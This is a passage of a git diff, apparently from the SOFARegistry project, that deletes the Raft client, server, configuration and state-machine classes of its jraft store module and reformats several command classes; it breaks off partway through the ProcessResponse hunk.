RouteTable.getInstance().refreshConfiguration(cliClientService, groupId, - timeout); - if (!status.isOk()) { - throw new IllegalStateException(String.format( - "Refresh configuration failed, error=%s", status.getErrorMsg())); - } - - return leader; - } catch (Exception e) { - LOGGER.error("Refresh leader failed", e); - throw new IllegalStateException("Refresh leader failed", e); - } - } - - /** - * get leader - * @return - */ - public PeerId getLeader() { - PeerId leader = RouteTable.getInstance().selectLeader(groupId); - if (leader == null) { - leader = refreshLeader(); - } - return leader; - } - - /** - * raft client send request - * @param request - * @return - */ - public Object sendRequest(ProcessRequest request) { - try { - if (!started.get()) { - LOGGER.error("Client must be started before send request!"); - throw new IllegalStateException("Client must be started before send request!"); - } - - PeerId peer = getLeader(); - LOGGER.info("Raft client send message {} to url {}", request, peer.getEndpoint() - .toString()); - Object response = this.rpcClient.invokeSync(peer.getEndpoint().toString(), request, - cliOptions.getRpcDefaultTimeout()); - if (response == null) { - LOGGER.error("Send process request has no response return!"); - throw new RuntimeException("Send process request has no response return!"); - } - ProcessResponse cmd = (ProcessResponse) response; - if (cmd.getSuccess()) { - return cmd.getEntity(); - } else { - String redirect = cmd.getRedirect(); - if (redirect != null && !redirect.isEmpty()) { - return redirectRequest(request, redirect); - } else { - throw new IllegalStateException("Server error:" + cmd.getEntity()); - } - } - } catch (Exception e) { - LOGGER.error("Send process request error!", e); - throw new RuntimeException("Send process request error!" + e.getMessage(), e); - } - } - - private Object redirectRequest(ProcessRequest request, String redirect) { - try { - PeerId redirectLead = new PeerId(); - if (!redirectLead.parse(redirect)) { - throw new IllegalArgumentException("Fail to parse serverId:" + redirect); - } - - //wait for onLeaderStart - TimeUnit.MILLISECONDS.sleep(1000); - - LOGGER.info("Redirect request send to return peer {},request {}", redirect, request); - Object response = this.rpcClient.invokeSync(redirectLead.getEndpoint().toString(), - request, cliOptions.getRpcDefaultTimeout()); - ProcessResponse cmd = (ProcessResponse) response; - if (cmd.getSuccess()) { - RouteTable.getInstance().updateLeader(groupId, redirectLead); - return cmd.getEntity(); - } else { - refreshLeader(); - throw new IllegalStateException("Redirect request server error:" + cmd.getEntity()); - } - } catch (Exception e) { - LOGGER.error("Redirect process request error!", e); - throw new RuntimeException("Redirect process request error!" + e.getMessage(), e); - } - } - - /** - * Getter method for property groupId. - * - * @return property value of groupId - */ - public String getGroupId() { - return groupId; - } -} \ No newline at end of file diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/bootstrap/RaftServer.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/bootstrap/RaftServer.java deleted file mode 100644 index 2aad27198..000000000 --- a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/bootstrap/RaftServer.java +++ /dev/null @@ -1,258 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.jraft.bootstrap; - -import com.alipay.remoting.rpc.RpcClient; -import com.alipay.remoting.rpc.RpcServer; -import com.alipay.sofa.jraft.Node; -import com.alipay.sofa.jraft.RaftGroupService; -import com.alipay.sofa.jraft.conf.Configuration; -import com.alipay.sofa.jraft.core.NodeImpl; -import com.alipay.sofa.jraft.entity.PeerId; -import com.alipay.sofa.jraft.option.NodeOptions; -import com.alipay.sofa.jraft.rpc.RaftRpcServerFactory; -import com.alipay.sofa.jraft.rpc.impl.AbstractBoltClientService; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.jraft.command.NotifyLeaderChange; -import com.alipay.sofa.registry.jraft.handler.NotifyLeaderChangeHandler; -import com.alipay.sofa.registry.jraft.handler.RaftServerConnectionHandler; -import com.alipay.sofa.registry.jraft.handler.RaftServerHandler; -import com.alipay.sofa.registry.jraft.processor.FollowerProcessListener; -import com.alipay.sofa.registry.jraft.processor.LeaderProcessListener; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.metrics.ReporterUtils; -import com.alipay.sofa.registry.net.NetUtil; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.ChannelHandler; -import com.alipay.sofa.registry.remoting.bolt.BoltServer; -import com.alipay.sofa.registry.remoting.bolt.SyncUserProcessorAdapter; -import com.alipay.sofa.registry.util.FileUtils; - -import java.io.File; -import java.io.IOException; -import java.util.ArrayList; -import java.util.Collection; -import java.util.List; - -/** - * - * @author shangyu.wh - * @version $Id: RaftServer.java, v 0.1 2018-05-16 11:39 shangyu.wh Exp $ - */ -public class RaftServer { - - private static final Logger LOGGER = LoggerFactory.getLogger(RaftServer.class); - - private RaftGroupService raftGroupService; - private Node node; - private ServiceStateMachine fsm; - private PeerId serverId; - private Configuration initConf; - private String groupId; - private String dataPath; - private List serverHandlers = new ArrayList<>(); - - private LeaderProcessListener leaderProcessListener; - - private FollowerProcessListener followerProcessListener; - - private BoltServer boltServer; - - /** - * - * @param dataPath Example: /tmp/server1 - * @param groupId - * @param serverIdStr Example: 127.0.0.1:8081 - * @param initConfStr Example: 127.0.0.1:8081,127.0.0.1:8082,127.0.0.1:8083 - * @throws IOException - */ - public RaftServer(String dataPath, String groupId, String serverIdStr, String initConfStr) { - this.dataPath = dataPath; - this.groupId = groupId; - serverId = new PeerId(); - if (!serverId.parse(serverIdStr)) { - throw new IllegalArgumentException("Fail to parse serverId:" + serverIdStr); - } - - initConf = new Configuration(); - if (!initConf.parse(initConfStr)) { - throw new IllegalArgumentException("Fail to parse initConf:" + initConfStr); - } - } - - /** - * start raft server - * @param raftServerConfig - * @throws IOException - */ - public void start(RaftServerConfig raftServerConfig) throws IOException { - - FileUtils.forceMkdir(new File(dataPath)); - - serverHandlers.add(new RaftServerHandler(this)); - serverHandlers.add(new RaftServerConnectionHandler()); - - boltServer = new BoltServer(new URL(NetUtil.getLocalAddress().getHostAddress(), - serverId.getPort()), serverHandlers); - - boltServer.initServer(); - - RpcServer rpcServer = boltServer.getRpcServer(); - - RaftRpcServerFactory.addRaftRequestProcessors(rpcServer); - - this.fsm = ServiceStateMachine.getInstance(); - this.fsm.setLeaderProcessListener(leaderProcessListener); - this.fsm.setFollowerProcessListener(followerProcessListener); - - NodeOptions nodeOptions = initNodeOptions(raftServerConfig); - - this.raftGroupService = new RaftGroupService(groupId, serverId, nodeOptions, rpcServer); - //start - this.node = this.raftGroupService.start(); - - if (raftServerConfig.isEnableMetrics()) { - ReporterUtils.startSlf4jReporter(raftServerConfig.getEnableMetricsReporterPeriod(), - node.getNodeMetrics().getMetricRegistry(), raftServerConfig.getMetricsLogger()); - } - - RpcClient raftClient = ((AbstractBoltClientService) (((NodeImpl) node).getRpcService())) - .getRpcClient(); - - NotifyLeaderChangeHandler notifyLeaderChangeHandler = new NotifyLeaderChangeHandler( - groupId, null); - raftClient.registerUserProcessor(new SyncUserProcessorAdapter(notifyLeaderChangeHandler)); - } - - /** - * shutdown raftGroupService - */ - public void shutdown() { - if (raftGroupService != null) { - this.raftGroupService.shutdown(); - } - } - - private NodeOptions initNodeOptions(RaftServerConfig raftServerConfig) { - - NodeOptions nodeOptions = new NodeOptions(); - - nodeOptions.setElectionTimeoutMs(raftServerConfig.getElectionTimeoutMs()); - - nodeOptions.setDisableCli(false); - - nodeOptions.setSnapshotIntervalSecs(raftServerConfig.getSnapshotIntervalSecs()); - - nodeOptions.setInitialConf(initConf); - - nodeOptions.setFsm(this.fsm); - - nodeOptions.setLogUri(dataPath + File.separator + "log"); - nodeOptions.setRaftMetaUri(dataPath + File.separator + "raft_meta"); - nodeOptions.setSnapshotUri(dataPath + File.separator + "snapshot"); - - if (raftServerConfig.isEnableMetrics()) { - nodeOptions.setEnableMetrics(raftServerConfig.isEnableMetrics()); - } - - return nodeOptions; - } - - /** - * Redirect request to new leader - * @return - */ - public String redirect() { - if (node != null) { - PeerId leader = node.getLeaderId(); - if (leader != null) { - return leader.toString(); - } - } - return null; - } - - /** - * send notify - * @param leader - * @param sender - */ - public void sendNotify(PeerId leader, String sender) { - - if (boltServer == null) { - LOGGER.error("Send notify leader change error!server must be started!"); - throw new IllegalStateException("Send notify leader change error!server must be started!"); - } - NotifyLeaderChange notifyLeaderChange = new NotifyLeaderChange(leader); - notifyLeaderChange.setSender(sender); - Collection channels = boltServer.getChannels(); - - List throwables = new ArrayList<>(); - channels.forEach(channel -> { - try { - boltServer.sendSync(channel, notifyLeaderChange, - 1000); - } catch (Exception e) { - LOGGER.error("Send notify leader change error!url:{}", channel.getRemoteAddress(), e); - throwables.add(e); - } - }); - - if (!throwables.isEmpty()) { - LOGGER.error("Send notify leader change error!"); - throw new RuntimeException("Send notify leader change error!"); - } - } - - /** - * Getter method for property fsm. - * - * @return property value of fsm - */ - public ServiceStateMachine getFsm() { - return this.fsm; - } - - /** - * Getter method for property node. - * - * @return property value of node - */ - public Node getNode() { - return this.node; - } - - /** - * Setter method for property leaderProcessListener. - * - * @param leaderProcessListener value to be assigned to property leaderProcessListener - */ - public void setLeaderProcessListener(LeaderProcessListener leaderProcessListener) { - this.leaderProcessListener = leaderProcessListener; - } - - /** - * Setter method for property followerProcessListener. - * - * @param followerProcessListener value to be assigned to property followerProcessListener - */ - public void setFollowerProcessListener(FollowerProcessListener followerProcessListener) { - this.followerProcessListener = followerProcessListener; - } - -} \ No newline at end of file diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/bootstrap/RaftServerConfig.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/bootstrap/RaftServerConfig.java deleted file mode 100644 index 9e68e1e66..000000000 --- a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/bootstrap/RaftServerConfig.java +++ /dev/null @@ -1,144 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.jraft.bootstrap; - -import com.alipay.sofa.registry.log.Logger; - -/** - * - * @author shangyu.wh - * @version $Id: RaftServerConifg.java, v 0.1 2018-08-23 13:13 shangyu.wh Exp $ - */ -public class RaftServerConfig { - - /** - * Whether to enable metrics for node. - */ - private boolean enableMetrics = false; - - /** - * Whether to enable metrics interval seconds - */ - private int enableMetricsReporterPeriod = 30; - - /** - * A follower would become a candidate if it doesn't receive any message - * from the leader in |election_timeout_ms| milliseconds - * Default: 1000 (1s) - */ - private int electionTimeoutMs = 1000; - - /** - * A snapshot saving would be triggered every |snapshot_interval_s| seconds - * if this was reset as a positive number - * If |snapshot_interval_s| <= 0, the time based snapshot would be disabled. - * Default: 3600 (1 hour) - */ - private int snapshotIntervalSecs = 3600; - - private Logger metricsLogger; - - /** - * Getter method for property enableMetrics. - * - * @return property value of enableMetrics - */ - public boolean isEnableMetrics() { - return enableMetrics; - } - - /** - * Setter method for property enableMetrics. - * - * @param enableMetrics value to be assigned to property enableMetrics - */ - public void setEnableMetrics(boolean enableMetrics) { - this.enableMetrics = enableMetrics; - } - - /** - * Getter method for property enableMetricsReporterPeriod. - * - * @return property value of enableMetricsReporterPeriod - */ - public int getEnableMetricsReporterPeriod() { - return enableMetricsReporterPeriod; - } - - /** - * Setter method for property enableMetricsReporterPeriod. - * - * @param enableMetricsReporterPeriod value to be assigned to property enableMetricsReporterPeriod - */ - public void setEnableMetricsReporterPeriod(int enableMetricsReporterPeriod) { - this.enableMetricsReporterPeriod = enableMetricsReporterPeriod; - } - - /** - * Getter method for property electionTimeoutMs. - * - * @return property value of electionTimeoutMs - */ - public int getElectionTimeoutMs() { - return electionTimeoutMs; - } - - /** - * Setter method for property electionTimeoutMs. - * - * @param electionTimeoutMs value to be assigned to property electionTimeoutMs - */ - public void setElectionTimeoutMs(int electionTimeoutMs) { - this.electionTimeoutMs = electionTimeoutMs; - } - - /** - * Getter method for property snapshotIntervalSecs. - * - * @return property value of snapshotIntervalSecs - */ - public int getSnapshotIntervalSecs() { - return snapshotIntervalSecs; - } - - /** - * Setter method for property snapshotIntervalSecs. - * - * @param snapshotIntervalSecs value to be assigned to property snapshotIntervalSecs - */ - public void setSnapshotIntervalSecs(int snapshotIntervalSecs) { - this.snapshotIntervalSecs = snapshotIntervalSecs; - } - - /** - * Getter method for property metricsLogger. - * - * @return property value of metricsLogger - */ - public Logger getMetricsLogger() { - return metricsLogger; - } - - /** - * Setter method for property metricsLogger. - * - * @param metricsLogger value to be assigned to property metricsLogger - */ - public void setMetricsLogger(Logger metricsLogger) { - this.metricsLogger = metricsLogger; - } -} \ No newline at end of file diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/bootstrap/ServiceStateMachine.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/bootstrap/ServiceStateMachine.java deleted file mode 100644 index 7f869b7b2..000000000 --- a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/bootstrap/ServiceStateMachine.java +++ /dev/null @@ -1,285 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.jraft.bootstrap; - -import com.alipay.sofa.jraft.Closure; -import com.alipay.sofa.jraft.Iterator; -import com.alipay.sofa.jraft.Status; -import com.alipay.sofa.jraft.core.StateMachineAdapter; -import com.alipay.sofa.jraft.entity.LeaderChangeContext; -import com.alipay.sofa.jraft.error.RaftError; -import com.alipay.sofa.jraft.storage.snapshot.SnapshotReader; -import com.alipay.sofa.jraft.storage.snapshot.SnapshotWriter; -import com.alipay.sofa.jraft.util.Utils; -import com.alipay.sofa.registry.jraft.command.ProcessRequest; -import com.alipay.sofa.registry.jraft.command.ProcessResponse; -import com.alipay.sofa.registry.jraft.processor.FollowerProcessListener; -import com.alipay.sofa.registry.jraft.processor.LeaderProcessListener; -import com.alipay.sofa.registry.jraft.processor.LeaderTaskClosure; -import com.alipay.sofa.registry.jraft.processor.Processor; -import com.alipay.sofa.registry.jraft.processor.SnapshotProcess; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.caucho.hessian.io.Hessian2Input; -import com.caucho.hessian.io.SerializerFactory; - -import java.io.ByteArrayInputStream; -import java.io.File; -import java.io.IOException; -import java.nio.ByteBuffer; -import java.util.ArrayList; -import java.util.HashMap; -import java.util.List; -import java.util.Map; -import java.util.Set; -import java.util.concurrent.atomic.AtomicLong; - -/** - * - * @author shangyu.wh - * @version $Id: ServiceStateMachine.java, v 0.1 2018-05-21 15:54 shangyu.wh Exp $ - */ -public class ServiceStateMachine extends StateMachineAdapter { - - private static final Logger LOG = LoggerFactory - .getLogger(ServiceStateMachine.class); - - private LeaderProcessListener leaderProcessListener; - - private FollowerProcessListener followerProcessListener; - - private static volatile ServiceStateMachine instance; - - /** - * get instance of ServiceStateMachine - * @return - */ - public static ServiceStateMachine getInstance() { - if (instance == null) { - synchronized (ServiceStateMachine.class) { - if (instance == null) { - instance = new ServiceStateMachine(); - } - } - } - return instance; - } - - /** - * leader term - */ - private AtomicLong leaderTerm = new AtomicLong(-1); - - /** - * follower term - */ - private AtomicLong followerTerm = new AtomicLong(-1); - - /** - * verify is leader or not - * @return - */ - public boolean isLeader() { - return this.leaderTerm.get() > 0; - } - - /** - * verify is follower or not - * @return - */ - public boolean isfollower() { - return this.followerTerm.get() > 0; - } - - @Override - public void onApply(Iterator iter) { - while (iter.hasNext()) { - Closure done = iter.done(); - ByteBuffer data = iter.getData(); - ProcessRequest request; - LeaderTaskClosure closure = null; - - if (done != null) { - closure = (LeaderTaskClosure) done; - request = closure.getRequest(); - } else { - - Hessian2Input input = new Hessian2Input(new ByteArrayInputStream(data.array())); - SerializerFactory serializerFactory = new SerializerFactory(); - input.setSerializerFactory(serializerFactory); - try { - request = (ProcessRequest) input.readObject(); - input.close(); - } catch (IOException e) { - throw new RuntimeException( - "IOException occurred when Hessian serializer decode!", e); - } - } - - ProcessResponse response = Processor.getInstance().process(request); - - if (closure != null) { - closure.setResponse(response); - closure.run(Status.OK()); - } - iter.next(); - } - } - - @Override - public void onSnapshotSave(final SnapshotWriter writer, final Closure done) { - - Map workers = Processor.getInstance().getWorkers(); - Map snapshotProcessors = new HashMap<>(); - if (workers != null) { - workers.forEach((serviceId, worker) -> { - if (worker instanceof SnapshotProcess) { - SnapshotProcess snapshotProcessor = (SnapshotProcess) worker; - snapshotProcessors.put(serviceId, snapshotProcessor.copy()); - } - }); - } - Utils.runInThread(() -> { - String errors = null; - outer: - for (Map.Entry entry : snapshotProcessors.entrySet()) { - String serviceId = entry.getKey(); - SnapshotProcess snapshotProcessor = entry.getValue(); - Set fileNames = snapshotProcessor.getSnapshotFileNames(); - for (String fileName : fileNames) { - String savePath = writer.getPath() + File.separator + fileName; - LOG.info("Begin save snapshot path {}", savePath); - boolean ret = snapshotProcessor.save(savePath); - if (ret) { - if (!writer.addFile(fileName)) { - errors = String.format("Fail to add file %s to writer", fileName); - break outer; - } - } else { - errors = String.format("Fail to save service:%s snapshot %s", serviceId, savePath); - break outer; - } - } - } - if (errors != null) { - done.run(new Status(RaftError.EIO, errors)); - } else { - done.run(Status.OK()); - } - }); - - } - - @Override - public boolean onSnapshotLoad(SnapshotReader reader) { - if (isLeader()) { - LOG.warn("Leader is not supposed to load snapshot"); - return false; - } - List failServices = new ArrayList<>(); - Map workers = Processor.getInstance().getWorkers(); - if (workers != null) { - outer: for (Map.Entry entry : workers.entrySet()) { - String serviceId = entry.getKey(); - Object worker = entry.getValue(); - if (worker instanceof SnapshotProcess) { - SnapshotProcess snapshotProcess = (SnapshotProcess) worker; - Set fileNames = snapshotProcess.getSnapshotFileNames(); - - for (String fileName : fileNames) { - if (reader.getFileMeta(fileName) == null) { - LOG.error("Fail to find data file {} in {}", fileName, reader.getPath()); - failServices.add(serviceId); - break outer; - } - - String savePath = reader.getPath() + File.separator + fileName; - LOG.info("Begin load snapshot path {}", savePath); - boolean ret = snapshotProcess.load(savePath); - if (!ret) { - LOG.error("Fail to load service:{} snapshot {}", serviceId, savePath); - failServices.add(serviceId); - break outer; - } - } - } - } - } - - if (!failServices.isEmpty()) { - LOG.error("Fail to load services {} snapshot!", failServices); - return false; - } - return true; - } - - @Override - public void onLeaderStart(long term) { - this.leaderTerm.set(term); - if (leaderProcessListener != null) { - Utils.runInThread(() -> leaderProcessListener.startProcess()); - } - super.onLeaderStart(term); - } - - @Override - public void onLeaderStop(Status status) { - this.leaderTerm.set(-1); - if (leaderProcessListener != null) { - Utils.runInThread(() -> leaderProcessListener.stopProcess()); - } - super.onLeaderStop(status); - } - - @Override - public void onStopFollowing(LeaderChangeContext ctx) { - - this.followerTerm.set(-1); - if (followerProcessListener != null) { - Utils.runInThread(() -> followerProcessListener.stopProcess(ctx.getLeaderId())); - } - super.onStopFollowing(ctx); - } - - @Override - public void onStartFollowing(LeaderChangeContext ctx) { - - this.followerTerm.set(1); - if (followerProcessListener != null) { - Utils.runInThread(() -> followerProcessListener.startProcess(ctx.getLeaderId())); - } - super.onStartFollowing(ctx); - } - - /** - * Setter method for property leaderProcessListener. - * - * @param leaderProcessListener value to be assigned to property leaderProcessListener - */ - public void setLeaderProcessListener(LeaderProcessListener leaderProcessListener) { - this.leaderProcessListener = leaderProcessListener; - } - - /** - * Setter method for property followerProcessListener. - * - * @param followerProcessListener value to be assigned to property followerProcessListener - */ - public void setFollowerProcessListener(FollowerProcessListener followerProcessListener) { - this.followerProcessListener = followerProcessListener; - } -} \ No newline at end of file diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/command/CommandCodec.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/command/CommandCodec.java index 277e2d3e5..c33b0a754 100644 --- a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/command/CommandCodec.java +++ b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/command/CommandCodec.java @@ -21,36 +21,38 @@ /** * Command codec - * @author boyan (boyan@alibaba-inc.com) * - * 2018-Apr-25 1:30:30 PM + * @author boyan (boyan@alibaba-inc.com) + *

2018-Apr-25 1:30:30 PM */ public class CommandCodec { - /** - * encode the command,returns the byte array. - * @param obj - * @return - */ - public static byte[] encodeCommand(Object obj) { - try { - return SerializerManager.getSerializer(SerializerManager.Hessian2).serialize(obj); - } catch (CodecException e) { - throw new IllegalStateException(e); - } + /** + * encode the command,returns the byte array. + * + * @param obj + * @return + */ + public static byte[] encodeCommand(Object obj) { + try { + return SerializerManager.getSerializer(SerializerManager.Hessian2).serialize(obj); + } catch (CodecException e) { + throw new IllegalStateException(e); } + } - /** - * Decode the command object from byte array. - * @param content - * @param clazz - * @return - */ - public static T decodeCommand(byte[] content, Class clazz) { - try { - return SerializerManager.getSerializer(SerializerManager.Hessian2).deserialize(content, - clazz.getName()); - } catch (CodecException e) { - throw new IllegalStateException(e); - } + /** + * Decode the command object from byte array. + * + * @param content + * @param clazz + * @return + */ + public static T decodeCommand(byte[] content, Class clazz) { + try { + return SerializerManager.getSerializer(SerializerManager.Hessian2) + .deserialize(content, clazz.getName()); + } catch (CodecException e) { + throw new IllegalStateException(e); } + } } diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/command/NotifyLeaderChange.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/command/NotifyLeaderChange.java index a85efaa8c..23eac0c13 100644 --- a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/command/NotifyLeaderChange.java +++ b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/command/NotifyLeaderChange.java @@ -17,61 +17,60 @@ package com.alipay.sofa.registry.jraft.command; import com.alipay.sofa.jraft.entity.PeerId; - import java.io.Serializable; /** - * * @author shangyu.wh * @version $Id: NotifyLeaderChange.java, v 0.1 2018-06-23 14:32 shangyu.wh Exp $ */ public class NotifyLeaderChange implements Serializable { - private final PeerId leader; + private final PeerId leader; - private String sender; + private String sender; - /** - * constructor - * @param leader - */ - public NotifyLeaderChange(PeerId leader) { - this.leader = leader; - } + /** + * constructor + * + * @param leader + */ + public NotifyLeaderChange(PeerId leader) { + this.leader = leader; + } - /** - * Getter method for property leader. - * - * @return property value of leader - */ - public PeerId getLeader() { - return leader; - } + /** + * Getter method for property leader. + * + * @return property value of leader + */ + public PeerId getLeader() { + return leader; + } - /** - * Getter method for property sender. - * - * @return property value of sender - */ - public String getSender() { - return sender; - } + /** + * Getter method for property sender. + * + * @return property value of sender + */ + public String getSender() { + return sender; + } - /** - * Setter method for property sender. - * - * @param sender value to be assigned to property sender - */ - public void setSender(String sender) { - this.sender = sender; - } + /** + * Setter method for property sender. + * + * @param sender value to be assigned to property sender + */ + public void setSender(String sender) { + this.sender = sender; + } - @Override - public String toString() { - final StringBuilder sb = new StringBuilder("NotifyLeaderChange{"); - sb.append("leader=").append(leader); - sb.append(", sender='").append(sender).append('\''); - sb.append('}'); - return sb.toString(); - } -} \ No newline at end of file + @Override + public String toString() { + final StringBuilder sb = new StringBuilder("NotifyLeaderChange{"); + sb.append("leader=").append(leader); + sb.append(", sender='").append(sender).append('\''); + sb.append('}'); + return sb.toString(); + } +} diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/command/ProcessRequest.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/command/ProcessRequest.java index 5c69aed67..960fea3c6 100644 --- a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/command/ProcessRequest.java +++ b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/command/ProcessRequest.java @@ -20,107 +20,105 @@ import java.util.Arrays; /** - * * @author shangyu.wh * @version $Id: ProcessRequest.java, v 0.1 2018-05-21 17:36 shangyu.wh Exp $ */ public class ProcessRequest implements Serializable { - /** invoke method */ - private String methodName; - - /** invoke method arguments name */ - private String[] methodArgSigs; - - /** invoke method arguments object */ - private Object[] methodArgs; - - /** traget service unique name */ - private String serviceName; - - public ProcessRequest() { - } - - /** - * Getter method for property methodName. - * - * @return property value of methodName - */ - public String getMethodName() { - return methodName; - } - - /** - * Setter method for property methodName. - * - * @param methodName value to be assigned to property methodName - */ - public void setMethodName(String methodName) { - this.methodName = methodName; - } - - /** - * Getter method for property methodArgSigs. - * - * @return property value of methodArgSigs - */ - public String[] getMethodArgSigs() { - return methodArgSigs; - } - - /** - * Setter method for property methodArgSigs. - * - * @param methodArgSigs value to be assigned to property methodArgSigs - */ - public void setMethodArgSigs(String[] methodArgSigs) { - this.methodArgSigs = methodArgSigs; - } - - /** - * Getter method for property methodArgs. - * - * @return property value of methodArgs - */ - public Object[] getMethodArgs() { - return methodArgs; - } - - /** - * Setter method for property methodArgs. - * - * @param methodArgs value to be assigned to property methodArgs - */ - public void setMethodArgs(Object[] methodArgs) { - this.methodArgs = methodArgs; - } - - /** - * Getter method for property serviceName. - * - * @return property value of serviceName - */ - public String getServiceName() { - return serviceName; - } - - /** - * Setter method for property serviceName. - * - * @param serviceName value to be assigned to property serviceName - */ - public void setServiceName(String serviceName) { - this.serviceName = serviceName; - } - - @Override - public String toString() { - final StringBuilder sb = new StringBuilder("ProcessRequest{"); - sb.append("methodName='").append(methodName).append('\''); - sb.append(", methodArgSigs=").append(Arrays.toString(methodArgSigs)); - sb.append(", methodArgs=").append(Arrays.toString(methodArgs)); - sb.append(", serviceName='").append(serviceName).append('\''); - sb.append('}'); - return sb.toString(); - } -} \ No newline at end of file + /** invoke method */ + private String methodName; + + /** invoke method arguments name */ + private String[] methodArgSigs; + + /** invoke method arguments object */ + private Object[] methodArgs; + + /** traget service unique name */ + private String serviceName; + + public ProcessRequest() {} + + /** + * Getter method for property methodName. + * + * @return property value of methodName + */ + public String getMethodName() { + return methodName; + } + + /** + * Setter method for property methodName. + * + * @param methodName value to be assigned to property methodName + */ + public void setMethodName(String methodName) { + this.methodName = methodName; + } + + /** + * Getter method for property methodArgSigs. + * + * @return property value of methodArgSigs + */ + public String[] getMethodArgSigs() { + return methodArgSigs; + } + + /** + * Setter method for property methodArgSigs. + * + * @param methodArgSigs value to be assigned to property methodArgSigs + */ + public void setMethodArgSigs(String[] methodArgSigs) { + this.methodArgSigs = methodArgSigs; + } + + /** + * Getter method for property methodArgs. + * + * @return property value of methodArgs + */ + public Object[] getMethodArgs() { + return methodArgs; + } + + /** + * Setter method for property methodArgs. + * + * @param methodArgs value to be assigned to property methodArgs + */ + public void setMethodArgs(Object[] methodArgs) { + this.methodArgs = methodArgs; + } + + /** + * Getter method for property serviceName. + * + * @return property value of serviceName + */ + public String getServiceName() { + return serviceName; + } + + /** + * Setter method for property serviceName. + * + * @param serviceName value to be assigned to property serviceName + */ + public void setServiceName(String serviceName) { + this.serviceName = serviceName; + } + + @Override + public String toString() { + final StringBuilder sb = new StringBuilder("ProcessRequest{"); + sb.append("methodName='").append(methodName).append('\''); + sb.append(", methodArgSigs=").append(Arrays.toString(methodArgSigs)); + sb.append(", methodArgs=").append(Arrays.toString(methodArgs)); + sb.append(", serviceName='").append(serviceName).append('\''); + sb.append('}'); + return sb.toString(); + } +} diff --git a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/command/ProcessResponse.java b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/command/ProcessResponse.java index 4dfe59d61..26cf20e2d 100644 --- a/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/command/ProcessResponse.java +++ b/server/store/jraft/src/main/java/com/alipay/sofa/registry/jraft/command/ProcessResponse.java @@ -19,153 +19,156 @@ import java.io.Serializable; /** - * * @author shangyu.wh * @version $Id: Response.java, v 0.1 2018-05-21 14:22 shangyu.wh Exp $ */ public class ProcessResponse implements Serializable { - private final Object entity; - - private final Boolean success; - - private final String redirect; - - /** - * constructor - * @param entity - * @param success - * @param redirect - */ - public ProcessResponse(Object entity, Boolean success, String redirect) { - this.entity = entity; - this.success = success; - this.redirect = redirect; - } - - /** - * response ok - * @return - */ - public static ResponseBuilder ok() { - return setStatus(true); - } - - /** - * response ok - * @param entity - * @return - */ - public static ResponseBuilder ok(Object entity) { - ResponseBuilder b = ok(); - b.entity(entity); - return b; - } - - /** - * response fail - * @return - */ - public static ResponseBuilder fail() { - return setStatus(false); - } - - /** - * response fail - * @param errorMsg - * @return - */ - public static ResponseBuilder fail(String errorMsg) { - ResponseBuilder b = fail(); - b.entity(errorMsg); - return b; - } - - /** - * response redirect - * @param leader - * @return - */ - public static ResponseBuilder redirect(String leader) { - ResponseBuilder b = fail(); - b.entity("Not leader"); - b.redirect(leader); - return 